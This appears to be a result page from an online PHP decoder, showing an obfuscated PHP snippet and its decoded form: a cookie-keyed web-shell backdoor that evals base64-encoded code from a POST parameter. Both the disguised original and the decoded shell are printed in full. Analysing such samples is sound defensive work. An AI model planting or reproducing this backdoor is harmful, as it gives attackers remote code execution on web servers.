Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $key = "ba87216b0f142c4d1029872b357495d2"; $a94eec34="\142\x61\163\x65\66\64\137\..
Decoded Output download
if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); }
Did this file decode correctly?
Original Code
<?php $key = "ba87216b0f142c4d1029872b357495d2"; $a94eec34="\142\x61\163\x65\66\64\137\144\x65\x63\x6f\x64\145";@eval($a94eec34($a94eec34("YVdZb2JXUTFLQ1JmUTA5UFMwbEZXeWRyWlhrblhTa2dQVDBnSkd0bGVTa2dleUJsZG1Gc0lDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVFOVRWRnNpWTI5a1pTSmRLU2s3SUgwPQ=="))); ?>
Function Calls
base64_decode | 2 |
Stats
MD5 | 2d5b93e6bd8a32409c6f8ad5c557b995 |
Eval Count | 1 |
Decode Time | 52 ms |